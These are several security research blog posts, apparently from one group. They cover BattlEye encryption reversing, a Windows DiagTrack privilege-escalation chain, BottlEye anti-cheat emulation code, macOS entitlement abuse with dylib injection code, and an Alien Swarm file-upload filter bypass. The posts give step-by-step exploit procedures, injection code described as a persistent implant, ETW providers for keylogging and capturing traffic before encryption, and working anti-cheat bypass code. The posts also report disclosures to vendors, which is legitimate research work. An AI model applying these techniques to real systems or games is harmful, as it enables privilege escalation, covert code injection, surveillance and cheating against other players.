If we look for references to the first routine 0x1196fd, we’ll see that it’s actually referenced again, this time with a different key!

That means the first key was actually a red herring, and the second key is most likely the correct one. Nice one Bastian!

Now that we’ve figured out the real xor key and the arguments to 0x3dce60, which are in the order: (rcx, rdx, r8, r9, rsp+0x20, rsp+0x28).

We go to that function in IDA, hit F5 and it’s very readable:

We know the order of the arguments, their type and their meaning, the only thing left is to translate this to actual code, which we’ve done nicely and wrapped into a gist available here.

Synopsis

This encryption wasn’t the hardest to reverse engineer, and our efforts were certainly noticed by BattlEye; after 3 days, the encryption was changed to a TLS-like model, where RSA is used to securely exchange AES keys. This makes MITM without reading process memory by all intents and purposes infeasible.

Windows Telemetry service elevation of privilege

By: Jonas L
1 July 2020 at 23:00

Today, we will be looking at the “Connected User Experiences and Telemetry service,” also known as “diagtrack.” This article is quite heavy on NTFS-related terminology, so you’ll need to have a good understanding of it.

A feature known as “Advanced Diagnostics” in the Feedback Hub caught my interest. It is triggerable by all users and causes file activity in C:\Windows\Temp, a directory that is writeable for all users.

Reverse engineering the functionality and duplicating the needed interactions was quite a challenge as it used WinRT IPC instead of COM and I did not know WinRT existed, so I had some catching up to do.

In C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.2003.1312.0_x64__8wekyb3d8bbwe\Helper.dll, I found a function with surprising possibilities:

WINRT_IMPL_AUTO(void) StartCustomTrace(param::hstring const& customTraceProfile) const;

This function will execute a WindowsPerformanceRecorder profile defined in an XML file specified as an argument in the security context of the Diagtrack Service.

The file path is parsed relative to the System32 folder, so I dropped an XML file in the writeable-for-all directory System32\Spool\Drivers\Color and passed that file path relative to the system directory aforementioned and voila - a trace recording was started by Diagtrack!

If we look at a minimal WindowsPerformanceRecorder profile we’d see something like this:

<WindowsPerformanceRecorder Version="1">
 <Profiles>
  <SystemCollector Id="SystemCollector">
   <BufferSize Value="256" />
   <Buffers Value="4" PercentageOfTotalMemory="true" MaximumBufferSpace="128" />
  </SystemCollector>  
  <EventCollector Id="EventCollector_DiagTrack_1e6a" Name="DiagTrack_1e6a_0">
   <BufferSize Value="256" />
   <Buffers Value="0.9" PercentageOfTotalMemory="true" MaximumBufferSpace="4" />
  </EventCollector>
   <SystemProvider Id="SystemProvider" /> 
  <Profile Id="Performance_Desktop.Verbose.Memory" Name="Performance_Desktop"
     Description="exploit" LoggingMode="File" DetailLevel="Verbose">
   <Collectors>
    <SystemCollectorId Value="SystemCollector">
     <SystemProviderId Value="SystemProvider" />
    </SystemCollectorId> 
    <EventCollectorId Value="EventCollector_DiagTrack_1e6a">
     <EventProviders>
      <EventProviderId Value="EventProvider_d1d93ef7" />
     </EventProviders>
    </EventCollectorId>    
    </Collectors>
  </Profile>
 </Profiles>
</WindowsPerformanceRecorder>

Information Disclosure

Having full control of the file opens some possibilities. The name attribute of the EventCollector element is used to create the filename of the recorded trace. The file path becomes:

C:\Windows\Temp\DiagTrack_alternativeTrace\WPR_initiated_DiagTrackAlternativeLogger_DiagTrack_XXXXXX.etl (where XXXXXX is the value of the name attribute.)

Full control over the filename and path is easily gained by setting the name to: \..\..\file.txt: which becomes the below:

C:\Windows\Temp\DiagTrack_alternativeTrace\WPR_initiated_DiagTrackAlternativeLogger_DiagTrack\..\..\file.txt:.etl

This results in C:\Windows\Temp\file.txt being used.

The recorded traces are opened by SYSTEM with FILE_OVERWRITE_IF as disposition, so it is possible to overwrite any file writeable by SYSTEM. The creation of files and directories (by appending ::$INDEX_ALLOCATION) in locations writeable by SYSTEM is also possible.

The ability to select any ETW provider for traces executed by the service is also interesting from an information disclosure point of view.

One scenario where I could see myself using the data is when you don’t know a filename because a service creates a file in a folder where you do not have permission to list the files.

Such filenames can get leaked by Microsoft-Windows-Kernel-File provider as shown in this snippet from an etl file recorded by adding 22FB2CD6-0E7B-422B-A0C7-2FAD1FD0E716 to the WindowsPerformanceRecorder profile file.

<EventData>
 <Data Name="Irp">0xFFFF81828C6AC858</Data>
 <Data Name="FileObject">0xFFFF81828C85E760</Data>
 <Data Name="IssuingThreadId">  10096</Data>
 <Data Name="CreateOptions">0x1000020</Data>
 <Data Name="CreateAttributes">0x0</Data>
 <Data Name="ShareAccess">0x3</Data>
 <Data Name="FileName">\Device\HarddiskVolume2\Users\jonas\OneDrive\Dokumenter\FeedbackHub\DiagnosticLogs\Install and Update-Post-update app experience\2019-12-13T05.42.15-SingleEscalations_132206860759206518\file_14_ProgramData_USOShared_Logs__</Data>
</EventData>

Such leakage can yield exploitation possibility from seemingly unexploitable scenarios.

Other security bypassing providers:

  • Microsoft-Windows-USB-UCX {36DA592D-E43A-4E28-AF6F-4BC57C5A11E8}
  • Microsoft-Windows-USB-USBPORT {C88A4EF5-D048-4013-9408-E04B7DB2814A} (Raw USB data is captured, enabling keyboard logging)
  • Microsoft-Windows-WinINet {43D1A55C-76D6-4F7E-995C-64C711E5CAFE}
  • Microsoft-Windows-WinINet-Capture {A70FF94F-570B-4979-BA5C-E59C9FEAB61B} (Raw HTTP traffic from iexplore, Microsoft Store, etc. is captured - SSL streams get captured pre-encryption.)
  • Microsoft-PEF-WFP-MessageProvider (IPSEC VPN data pre encryption)

Code Execution

Enough about information disclosure, how do we turn this into code execution?

The ability to control the destination of .etl files will most likely not lead to code execution easily; finding another entry point is probably necessary. The limited control over the files content makes exploitation very hard; perhaps crafting an executable PowerShell script or bat file is plausible, but then there is the problem of getting those executed.

Instead, I chose to combine my active trace recording with a call to:

WINRT_IMPL_AUTO(Windows::Foundation::IAsyncAction) SnapCustomTraceAsync(param::hstring const& outputDirectory)

When supplying an outputDirectory value located inside %WINDIR%\temp\DiagTrack_alternativeTrace (Where the .etl files of my running trace are saved) an interesting behavior emerges.

The Diagtrack Service will rename all the created .etl files in DiagTrack_alternativeTrace to the directory given as the outputDirectory argument to SnapCustomTraceAsync. This allows destination control to be acquired because rename operations that occur where the source file gets created in a folder that grants non-privileged users write access are exploitable. This is due to the permission inheritance of files and their parent directories. When a file is moved by a rename operation, the DACL does not change. What this means is that if we can make the destination become %WINDIR%\System32, and somehow move the file then we will still have write permission to the file. So, we know we control the outputDirectory argument of SnapCustomTraceAsync, but some limitations exist.

If the chosen outputDirectory is not a child of %WINDIR%\temp\DiagTrack_alternativeTrace, the rename will not happen. The outputDirectory cannot exist because the Diagtrack Service has to create it. When created, it is created with SYSTEM as its owner; only the READ permission is granted to users.

This is problematic as we cannot make the directory into a mount point. Even if we had the required permissions, we would be stopped by not being able to empty the directory because Diagtrack has placed the snapshot output etl file inside it. Lucky for us, we can circumvent these obstacles by creating two levels of indirection between the outputDirectory destination and DiagTrack_alternativeTrace.

By creating the folder DiagTrack_alternativeTrace\extra\indirections and supplying %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections\snap as the outputDirectory we allow Diagtrack to create the snap folder with its limited permissions, as we are inside DiagTrack_alternativeTrace. With this, we can rename the extra folder, as it is created by us. The two levels of indirection is necessary to bypass the locking of the directory due to Diagtrack having open files inside the directory. When extra is renamed, we can recreate %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections\snap (which is now empty) and we have full permissions to it as we are the owner!

Now, we can turn DiagTrack_alternativeTrace\extra\indirections\snap into a mount point targeted at %WINDIR%\system32 and Diagtrack will move all files matching WPR_initiated_DiagTrack*.etl* into %WINDIR%\system32. The files will still be writeable as they were created in a folder that granted users permission to WRITE. Unfortunately, having full control over a file in System32 is not quite enough for code execution… that is, unless we have a way of executing user controllable filenames - like the DiagnosticHub plugin method popularized by James Forshaw. There’s a caveat though, DiagnosticHub now requires any DLL it loads to be signed by Microsoft, but we do have some ways to execute a DLL file in system32 under SYSTEM security context - if the filename is something specific. Another snag though is that the filename is not controllable. So, how can we take control?

If instead of making the mountpoint target System32, we target an Object Directory in the NT namespace and create a symbolic link with the same name as the rename destination file, we gain control over the filename. The target of the symbolic link will become the rename operations destination. For instance, setting it to\??\%WINDIR%\system32\phoneinfo.dll results in write permission to a file the Error Reporting service will load and execute when an error report is submitted out of process. For my mountpoint target I chose \RPC Control as it allows all users to create symbolic links inside.

Let’s try it!

When Diagtrack should have done the rename, nothing happened. This is because, before the rename operation is done, the destination folder is opened, but now is an object directory. This means it’s unable to be opened by the file/directory API calls. This can be circumvented by timing the creation of the mount point to be after the opening of the folder, but before the rename. Normally in such situations, I create a file in the destination folder with the same name as the rename destination file. Then I put an oplock on the file, and when the lock breaks I know the folder check is done and the rename operation is about to begin. Before I release the lock I move the file to another folder and set the mount point on the now empty folder. That trick would not work this time though as the rename operation was configured to not overwrite an already existing file. This also means the rename would abort because of the existing file - without triggering the oplock.

On the verge of giving up I realized something:

If I make the junction point switch target between a benign folder and the object directory every millisecond there is 50% chance of getting the benign directory when the folder check is done and 50% chance of getting the object directory when the rename happens. That gives 25% chance for a rename to validate the check but end up as phoneinfo.dll in System32. I try avoiding race conditions if possible, but in this situation there did not appear to be any other ways forward and I could compensate for the chance of failure by repeating the process. To adjust for the probability of failure I decided to trigger an arbitrary number of renames, and fortunately for us, there’s a detail about the flow that made it possible to trigger as many renames I wanted in the same recording. The renames are not linked to files the diagnostic service knows it has created, so the only requirement is that they are in %WINDIR%\temp\DiagTrack_alternativeTrace and match WPR_initiated_DiagTrack*.etl*

Since we have permission to create files in the target folder, we can now create WPR_initiated_DiagTrack0.etl, WPR_initiated_DiagTrack1.etl, etc. and they will all get renamed!

As the goal is one of the files ending up as phoneinfo.dll in System32, why not just create the files as hard links to the intended payload? This way there is no need to use the WRITE permission to overwrite the file after the move.

After some experimentation I came to the following solution:

  1. Create the folders %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections
  2. Start diagnostic trace

    • %WINDIR%\temp\DiagTrack_alternativeTrace\WPR_initiated_DiagTrackAlternativeLogger_WPR System Collector.etl is created
  3. Create %WINDIR%\temp\DiagTrack_alternativeTrace\WPR_initiated_DiagTrack[0-100].etl as hardlinks to the payload.
  4. Create symbolic links \RPC Control\WPR_initiated_DiagTrack[0-100.]etl targeting %WINDIR%\system32\phoneinfo.dll
  5. Make OPLOCK on WPR_initiated_DiagTrack100.etl; when broken, check if %WINDIR%\system32\phoneinfo.dll exists. If not, repeat creation of WPR_initiated_DiagTrack[].etl files and matching symbolic links.
  6. Make OPLOCK on on WPR_initiated_DiagTrack0.etl; when it is broken, we know that the rename flow has begun but the first rename operation has not happened yet.

Upon breakage:

  1. rename %WINDIR%\temp\DiagTrack_alternativeTrace\extra to %WINDIR%\temp\DiagTrack_alternativeTrace\{RANDOM-GUID}
  2. Create folders %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections\snap
  3. Start thread that in a loop switches %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections\snap between being a mountpoint targeting %WINDIR%\temp\DiagTrack_alternativeTrace\extra and \RPC Control in NT object namespace.
  4. Start snapshot trace with %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections\snap as outputDirectory

Upon execution, 100 files will get renamed. If none of them becomes phoneinfo.dll in system32, it will repeat until success.

I then added a check for the existence of %WINDIR%\system32\phoneinfo.dll in the thread that switches the junction point. The increased delay between switching appeared to increase the chance of one of the renames creating phoneinfo.dll. Testing shows the loop ends by the end of the first 100 iterations.

Upon detection of %WINDIR%\system32\phoneinfo.dll, a blank error report is submitted to Windows Error Reporting service, configured to be submitted out of proc, causing wermgmr.exe to load the just created phoneinfo.dll in SYSTEM security context.

The payload is a DLL that upon DLL_PROCESS_ATTACH will check for SeImpersonatePrivilege and, if enabled, cmd.exe will get spawned on the current active desktop. Without the privileged check, additional command prompts would spawn since phoneinfo.dll is also attempted to be loaded by the process that initiates the error reporting.

In addition, a message is shown using WTSSendMessage so we get an indicator of success even if the command prompt cannot be spawned in the correct session/desktop.

The red color is because my command prompts auto execute echo test> C:\windows:stream && color 4E; that makes all UAC elevated command prompts’ background color RED as an indicator to me.

Though my example on the repository contains private libraries, it may still be beneficial to get a general overview of how it works.

BattlEye client emulation

By: vmcall
6 July 2020 at 23:00

The popular anti-cheat BattlEye is widely used by modern online games such as Escape from Tarkov and is considered an industry standard anti-cheat by many. In this article I will demonstrate a method I have been utilizing for the past year, which enables you to play any BattlEye-protected game online without even having to install BattlEye.

BattlEye initialisation

BattlEye is dynamically loaded by the respective game on startup to initialize the software service (“BEService”) and kernel driver (“BEDaisy”). These two components are critical in ensuring the integrity of the game, but the most critical component by far is the usermode library (“BEClient”) that the game interacts with directly. This module exports two functions: GetVer and more importantly Init.

The Init routine is what the game will call, but this functionality has never been documented before, as people mostly focus on BEDaisy or their shellcode. Most important routines in BEClient, including Init, are protected and virtualised by VMProtect, which we are able to devirtualise and reverse engineer thanks to vtil by secret club member Can Boluk, but the inner workings of BEClient is a topic for a later part of this series, so here is a quick summary.

Init and its arguments have the following definitions:

// BEClient_x64!Init
__declspec(dllexport)
battleye::instance_status Init(std::uint64_t integration_version,
                               battleye::becl_game_data* game_data,
                               battleye::becl_be_data* client_data);
  
enum instance_status
{
    NONE,
    NOT_INITIALIZED,
    SUCCESSFULLY_INITIALIZED,
    DESTROYING,
    DESTROYED
};

struct becl_game_data
{
    char*         game_version;
    std::uint32_t address;
    std::uint16_t port;

    // FUNCTIONS
    using print_message_t = void(*)(char* message);
    print_message_t print_message;

    using request_restart_t = void(*)(std::uint32_t reason);
    request_restart_t request_restart;

    using send_packet_t = void(*)(void* packet, std::uint32_t length);
    send_packet_t send_packet;

    using disconnect_peer_t = void(*)(std::uint8_t* guid, std::uint32_t guid_length, char* reason);
    disconnect_peer_t disconnect_peer;
};

struct becl_be_data
{
    using exit_t = bool(*)();
    exit_t exit;

    using run_t = void(*)();
    run_t run;

    using command_t = void(*)(char* command);
    command_t command;

    using received_packet_t = void(*)(std::uint8_t* received_packet, std::uint32_t length);
    received_packet_t received_packet;

    using on_receive_auth_ticket_t = void(*)(std::uint8_t* ticket, std::uint32_t length);
    on_receive_auth_ticket_t on_receive_auth_ticket;

    using add_peer_t = void(*)(std::uint8_t* guid, std::uint32_t guid_length);
    add_peer_t add_peer;

    using remove_peer_t = void(*)(std::uint8_t* guid, std::uint32_t guid_length);
    remove_peer_t remove_peer;
};

As seen, these are quite simple containers for interopability between the game and BEClient. becl_game_data is defined by the game and contains functions that BEClient needs to call (for example, send_packet) while becl_be_data is defined by BEClient and contains callbacks used by the game after initialisation (for example, received_packet). Note that these two structures slightly differ in some games that have special functionality, such as the recently introduced packet encryption in Escape from Tarkov that we’ve already cracked. Older versions of BattlEye (DayZ, Arma, etc.) use a completely different approach with function pointer swap hooks to intercept traffic communication, and therefore these structures don’t apply.

A simple Init implementation would look like this:

// BEClient_x64!Init
__declspec(dllexport)
battleye::instance_status Init(std::uint64_t integration_version,
                               battleye::becl_game_data* game_data,
                               battleye::becl_be_data* client_data)
{
    // CACHE RELEVANT FUNCTIONS
    battleye::delegate::o_send_packet    = game_data->send_packet;

    // SETUP CLIENT STRUCTURE
    client_data->exit                   = battleye::delegate::exit;
    client_data->run                    = battleye::delegate::run;
    client_data->command                = battleye::delegate::command;
    client_data->received_packet        = battleye::delegate::received_packet;
    client_data->on_receive_auth_ticket = battleye::delegate::on_receive_auth_ticket;
    client_data->add_peer               = battleye::delegate::add_peer;
    client_data->remove_peer            = battleye::delegate::remove_peer;

    return battleye::instance_status::SUCCESSFULLY_INITIALIZED;
}

This would allow our custom BattlEye client to receive packets sent from the game server’s BEServer module.

Packet handling

The function received_packet is by far the most important routine used by the game, as it handles incoming packets from the BattlEye server component. BattlEye communication is extremely simple compared to how important the integrity of it is. In recent versions of BattlEye, packets follow the same general structure:

#pragma pack(push, 1)
struct be_fragment
{
    std::uint8_t count;
    std::uint8_t index;
};

struct be_packet_header
{
    std::uint8_t id;
    std::uint8_t sequence;
};

struct be_packet : be_packet_header
{
    union 
    {
        be_fragment fragment;

        // DATA STARTS AT body[1] IF PACKET IS FRAGMENTED
        struct
        {
            std::uint8_t no_fragmentation_flag;
            std::uint8_t body[0];
        };
    };
    inline bool fragmented()
    {
        return this->fragment.count != 0x00;
    }
};
#pragma pack(pop)

All packets have an identifier and a sequence number (which is used by the requests/response communication and the heartbeat). Requests and responses have a fragmentation mode which allows BEServer and BEClient to send packets in chunks of 0x400 bytes (seemingly arbitrary) instead of sending one big packet.

In the current iteration of BattlEye, the following packets are used for communication:

INIT (00)

This packet is sent to the BEClient module as soon as the connection with the game server has been established. This packet is only transmitted once, contains no data besides the packet id 00 and the response to this packet is simply 00 05.

START (‘02’)

This packet is sent right after the ‘INIT’ packets have been exchanged, and contains the server-generated guid of the client. The response of this packet is simply the header: 02 00

REQUEST (04) / RESPONSE (05)

This type of packet is sent from BEServer to BEClient to request (and in rare cases, simply transmit) data, and BEClient will send back data for that request using the RESPONSE packet type.

The first request contains crucial information such as service- and integration version, not responding to it will get you disconnected by the game server. Afterwards, requests are game specific.

HEARTBEAT (09)

This type of packet is used by the BEServer module to ensure that the connection hasn’t been dropped. It is sent every 30 seconds using a sequential index, and if the client doesn’t respond with the same packet, the client is disconnected from the game server. This heartbeat packet is only three bytes long, with the sequential index used for synchronization being incremental and therefore easily emulated. An example heartbeat could be: 09 01 00, which is the second heartbeat (sequence starts at zero) transmitted.

Emulation

With this knowledge, it is possible by emulating the entire BattlEye anti-cheat with only two proprietary points of data: the responses for request sequence one and two. These can be intercepted using a tool such as wireshark and replayed as many times as you want for the respective game, because the packet encryption used by BattlEye is static and contextless.

Emulating the INIT packet is as stated simply responding with the sequence number five:

case battleye::packet_id::INIT:
{
    auto info_packet = battleye::be_packet{};
    info_packet.id       = battleye::packet_id::INIT;
    info_packet.sequence = 0x05;

    battleye::delegate::o_send_packet(&info_packet, sizeof(info_packet));
    break;
}

Emulating the START packet is done by replying with the received packet’s header:

case battleye::packet_id::START:
{
    battleye::delegate::o_send_packet(received_packet, sizeof(battleye::be_packet_header));
    break;
}

Emulating the HEARTBEAT packets is done by replying with the received packet:

case battleye::packet_id::HEARTBEAT:    
{
    battleye::delegate::o_send_packet(received_packet, length);
    break;
}

Emulating the REQUEST packets can be done by replaying previously generated responses, which can be logged with code hooks or man-in-the-middle software. These packets are game specific and some games might disconnect you for not handling a specific request, but most games only require the first two requests to be handled, afterwards simply replying with the packet header is enough to not get disconnected by the game server. It is important to notice that all REQUEST packets are immediately responded to with the header, to let the server know that the client is aware of the request. This is how BottlEye emulates them:

case battleye::packet_id::REQUEST:
{
    // IF NOT FRAGMENTED RESPOND IMMEDIATELY, ELSE ONLY RESPOND TO THE LAST FRAGMENT
    const auto respond = 
        !header->fragmented() || 
        (header->fragment.index == header->fragment.count - 1);

    if (!respond)
        return;

    // SEND BACK HEADER
    battleye::delegate::o_send_packet(received_packet, sizeof(battleye::be_packet_header));

    switch (header->sequence)
    {
    case 0x01:
    {
        battleye::delegate::respond(header->sequence,
            {
                // REDACTED BUFFER
            });
        break;
    }
    case 0x02:
    {
        battleye::delegate::respond(header->sequence, 
            {    
                // REDACTED BUFFER
            });
        break;
    }
    default:
        break;
    }
    break;
}

Which uses the following helper function for responses:

void battleye::delegate::respond(
    std::uint8_t response_index, 
    std::initializer_list<std::uint8_t> data)
{
    // SETUP RESPONSE PACKET WITH TWO-BYTE HEADER + NO-FRAGMENTATION TOGGLE

    const auto size = sizeof(battleye::be_packet_header) + 
                      sizeof(battleye::be_fragment::count) + 
                      data.size();

    auto packet = std::make_unique<std::uint8_t[]>(size);
    auto packet_buffer = packet.get();

    packet_buffer[0] = (battleye::packet_id::RESPONSE); // PACKET ID
    packet_buffer[1] = (response_index - 1);            // RESPONSE INDEX
    packet_buffer[2] = (0x00);                          // FRAGMENTATION DISABLED


    for (size_t i = 0; i < data.size(); i++)
    {
        packet_buffer[3 + i] = data.begin()[i];
    }

    battleye::delegate::o_send_packet(packet_buffer, size);
}

BottlEye

The full BottlEye project can be found on our GitHub repository. Below you can see this specific project being used in various popular video games.

Fortnite

The following video contains a live demonstration of my BottlEye project being used in the BattlEye-protected game Fortnite. In the video I live debug fortnite while playing online to prove that BattlEye is not loaded.

Insurgency

The following screenshot shows the BattlEye-protected game Insurgency running on Arch in Wine.

Escape from Tarkov

The following screenshot shows the usage of Cheat Engine in the popular, battleye-protected game Escape from Tarkov. This is possible because BattlEye has been replaced with BottlEye on disk.

Thanks to

  • Sabotage
  • Tamimego
  • Atex
  • namazso

Abusing MacOS Entitlements for code execution

By: impost0r
14 August 2020 at 23:00

Recently I disclosed some vulnerabilities to Dropbox and PortSwigger via H1 and Microsoft via MSRC pertaining to Application entitlements on MacOS. We’ll be exploring what entitlements are, what exactly you can do with them, and how they can be used to bypass security products.

These are all unpatched as of publish.

What’s an Entitlement?

On MacOS, an entitlement is a string that grants an Application specific permissions to perform specific tasks that may have an impact on the integrity of the system or user privacy. Entitlements can be viewed with the comand codesign -d --entitlements - $file.

Viewing the entitlements of the main Dropbox binary.

For the above image, we can see the key entitlements com.apple.security.cs.allow-unsigned-executable-memory and com.apple.security.cs.disable-library-validation - they allow exactly what they say on the tin. We’ll explore Dropbox first, as it’s the more involved of the two to exploit.

Dropbox

Just as Windows has PE and Linux has ELF, MacOS has its own executable format, Mach-O (short for Mach-Object). Mach-O files are used on all Apple products, ranging from iOS, to tvOS, to MacOS. In fact, all these operating systems share a common heritage stemming from NeXTStep, though that’s beyond the scope of this article.

MacOS has a variety of security protections in place, including Gatekeeper, AMFI (AppleMobileFileIntegrity), SIP (System Integrity Protection, a form of mandatory access control), code signing, etc. Gatekeeper is akin to Windows SmartScreen in that it fingerprints files, checks them against a list on Apple’s servers, and returns the value to determine if the file is safe to run. `

This is vastly simplified.

There are three configurable options, though the third is hidden by default - App Store only, App Store and identified developers, and “anywhere”, the third presumably hidden to minimize accidental compromise. Gatekeeper can also be managed by the command line tool, spctl(8), for more granular control of the system. One can even disable Gatekeeper entirely through spctl --master-disable, though this requires superuser access. It’s to be noted that this does not invalidate rules already in the System Policy database (/var/db/SystemPolicy), but allows anything not in the database, regardless of notarization, etc, to run unimpeded.

Now, back to Dropbox. Dropbox is compiled using the hardened runtime, meaning that without specific entitlements, JIT code cannot be executed, DYLD environment variables are automatically ignored, and unsigned libraries are not loaded (often resulting in a SIGKILL of the binary.) We can see that Dropbox allows unsigned executable memory, allowing shellcode injection, and has library validation disabled - meaning that any library can be inserted into the process. But how?

Using LIEF, we can easily add a new LoadCommand to Dropbox. In the following picture, you can see my tool, Coronzon, which is based off of yololib, doing the same.

Adding a LoadCommand to Dropbox

import lief

file = lief.parse('Dropbox')
file.add_library('inject.dylib')
file.write('Dropbox')

Using code similar to the following, one can execute code within the context of the Dropbox process (albeit via voiding the code signature - you’re best off stripping the code signature, or it won’t run from /Applications/). You’ll either have to strip the code signature or ad-hoc sign it to get it to run from /Applications/, though the application will lose any entitlements and TCC rights previously granted. You’ll have to use a technique known as dylib proxying - which is to say, replacing a library that is part of the application bundle with one of the same name that re-exports the library it’s replacing. (Using the link-time flags `-Xlinker -reexport_library $(PATH_TO_LIBRARY)).

#include <stdio.h>
#include <stdlib.h>
#include <syslog.h>

__attribute__((constructor))
static void customConstructor(int argc, const char **argv)
 {
     printf("Hello from dylib!\n");
     syslog(LOG_ERR, "Dylib injection successful in %s\n", argv[0]);
     system("open -a Calculator");
}

This is a simple example, but combined with something like frida-gum the impact becomes much more severe - allowing application introspection and runtime modification without the user’s knowledge. This makes for a great, persistent usermode implant, as Dropbox is added as a LaunchItem.

Visual Studio

Microsoft releases a cut-down version of their premier IDE for MacOS, mainly for C# development with Xamarin, .NET Core, and Mono. Though ‘cut-down’, it still supports many features of the original, including NuGet, IntelliSense, and more.

It also has some interesting entitlements.

Viewing the entitlements of the main Visual Studio binary.

Of course, MacOS users are treated as second class citizens in Microsoft’s ecosystem and Microsoft could not give a damn about the impact this has on the end user - which is similar in impact to the above, albeit more severe. We can see that basically every single feature of the hardened runtime is disabled - enabling the simplest of code injection methods, via the DYLD_INSERT_LIBRARIES environment variable. The following video is a proof of concept of just how easily code can be executed within the context of Visual Studio.

Keep in mind: code executing in this context will inherit the entitlements and TCC values of the parent. It’s not hard to imagine a scenario in which IP (intellectual property) theft could result from Microsoft’s attempts at ‘hardening’ Visual Studio for Mac. As with Dropbox, all the security implications are the same, yet it’s about 30x easier to pull off as DYLD environment variables are allowed.

Burp Suite

I’m sure most reading this article are familiar with Burp Suite. If not - it’s a web exploitation Swiss army knife that aids in recon, pre, and post-exploitation. So why don’t we exploit it?

This time, we’ll be exploiting the Burp Suite installer. As you’ll probably guess by now, it has some… interesting entitlements.

Viewing the entitlements of the Burp Installer stub.

Aside from the output lacking newlines, exploitation in this case is different. There are no shell scripts in the install (nor is the entitlement for allowing DYLD environment variables present), and if we’re going to create a malicious installer, we need to use what’s already packaged. So, we’ll tamper with the included JRE (jre.tar.gz) that’s included with the installer.

There’s actually two approaches to this - replacing a dylib outright or dylib hijacking. Dylib hijacking is similar to it’s partner, DLL hijacking, on Windows, in that it abuses the executable searching for a library that may or may not be there, usually specified by @rpath or sometimes a ‘weakref’. A weakref is a library that doesn’t need to be loaded, but can be loaded. For more information on dylib hijacking, I reccomend this excellent presentation by Patrick Wardle of Objective-See. For brevity, however, we’ll just be replacing a .dylib in the JRE.

The way the installer executes is that it extracts the JRE to a temporary location during install, which is used for the rest of the install. This temporary location is randomized and actually adds a layer of obfuscation to our attack, as no two executions will have the JRE extracted into the same place. Once the JRE is extraced, it’s loaded and attempts to install Burp Suite. This allows us to execute unsigned code under the guise and context of Burp Suite, running code in the background unbenknownst to the user. Thankfully Burp Suite doesn’t (currently) require elevated privileges to install on macOS. Nonetheless, this is an issue due to the ease of forging a malicious installer and the fact that Gatekeeper is none the wiser.

A proof of concept can be viewed below.

Conclusions

Entitlements are both a valuable component of MacOS’ security model, but can also be a double edged sword. You’ve seen how trivivally Gatekeeper and existing OS protections can be bypassed by leveraging a weak application as a trampoline - the one with the most impact in this case I argue to be Dropbox, due to inheritance of Dropbox’s TCC permissions and being a LaunchItem, thus gaining persistence. Thus, entitlements provide a valuable addition to the attack surface of MacOS for any red-teamer or bug-bounty hunter. Your mileage may vary, however - Dropbox and Microsoft didn’t seem to care much. (PortSwigger, on the other hand, admitted that due to the design of Burp Suite and inherent language intrinsics it’s extremely hard to prevent such an attack - and I don’t fault them).

Happy hacking.

Disclosure Timelines


Dropbox

  • June 11th, initial disclosure.
  • June 17th, additional information added
  • June 20th, closed as Informative

Visual Studio

  • June 19th, initial disclosure
  • June 22nd, closed (“Upon investigation, we have determined that this submission does not meet the bar for security servicing. This report does not appear to identify a weakness in a Microsoft product or service that would enable an attacker to compromise the integrity, availability, or confidentiality of a Microsoft offering. “)

Burp Suite

  • June 27th, initial disclosure
  • June 30th, closed as Informative

Wormable remote code execution in Alien Swarm

By: mev
30 October 2020 at 23:00

Alien Swarm was originally a free game released circa July 2010. It differs from most Source Engine games in that it is a top-down shooter, though with gameplay elements not dissimilar from Left 4 Dead. Fallen to the wayside, a small but dedicated community has expanded the game with Alien Swarm: Reactive Drop. The game averages about 800 users per day at peak, and is still actively updated.

Over a decade ago, multiple logic bugs in Source and GoldSrc titles allowed execution of arbitrary code from client to server, and vice-versa, allowing plugins to be stolen or arbitrary data to be written from client to server, or the reverse. We’ll be exploring a modern-day example of this, in Alien Swarm: Reactive Drop.

Client <-> Server file upload

Any Alien Swarm client can upload files to the game server (and vice versa) using the CNetChan->SendFile API, although with some questionable constraints: a client-side check in the game prevents the server from uploading files of certain extensions such as .dll, .cfg:

if ( (!(*(unsigned __int8 (__thiscall **)(int, char *, _DWORD))(*(_DWORD *)(dword_104153C8 + 4) + 40))(
         dword_104153C8 + 4,
         filename,
         0)
   || should_redownload_file((int)filename))
  && !strstr(filename, "//")
  && !strstr(filename, "\\\\")
  && !strstr(filename, ":")
  && !strstr(filename, "lua/")
  && !strstr(filename, "gamemodes/")
  && !strstr(filename, "addons/")
  && !strstr(filename, "..")
  && CNetChan::IsValidFileForTransfer(filename) ) // fails if filename ends with ".dll" and more
{ /* accept file */ }
bool CNetChan::IsValidFileForTransfer( const char *input_path )
{
    char fixed_slashes[260];

    if (!input_path || !input_path[0])
        return false;

    int l = strlen(input_path);
    if (l >= sizeof(fixed_slashes))
        return false;

    strncpy(fixed_slashes, input_path, sizeof(fixed_slashes));
    FixSlashes(fixed_slashes, '/');
    if (fixed_slashes[l-1] == '/')
        return false;

    if (
        stristr(input_path, "lua/")
        || stristr(input_path, "gamemodes/")
        || stristr(input_path, "scripts/")
        || stristr(input_path, "addons/")
        || stristr(input_path, "cfg/")
        || stristr(input_path, "~/")
        || stristr(input_path, "gamemodes.txt")
        )
        return false;

    const char *ext = strrchr(input_path, '.');
    if (!ext)
        return false;

    int ext_len = strlen(ext);
    if (ext_len > 4 || ext_len < 3)
        return false;

    const char *check = ext;
    while (*check)
    {
        if (isspace(*check))
            return false;

        ++check;
    }

    if (!stricmp(ext, ".cfg") ||
        !stricmp(ext, ".lst") ||
        !stricmp(ext, ".lmp") ||
        !stricmp(ext, ".exe") ||
        !stricmp(ext, ".vbs") ||
        !stricmp(ext, ".com") ||
        !stricmp(ext, ".bat") ||
        !stricmp(ext, ".dll") ||
        !stricmp(ext, ".ini") ||
        !stricmp(ext, ".log") ||
        !stricmp(ext, ".lua") ||
        !stricmp(ext, ".nut") ||
        !stricmp(ext, ".vdf") ||
        !stricmp(ext, ".smx") ||
        !stricmp(ext, ".gcf") ||
        !stricmp(ext, ".sys"))
        return false;

    return true;
}

Bypassing "//" and ".." can be done with "/\\" because there is a call to FixSlashes that makes proper slashes after the sanity check, and for the ".." the "/\\" will set the path to the root of the drive, so we can write to anywhere on the system if we know the path. Bypassing "lua/", "gamemodes/" and "addons/" can be done by using capital letters e.g. "ADDONS/" since file paths are not case sensitive on Windows.

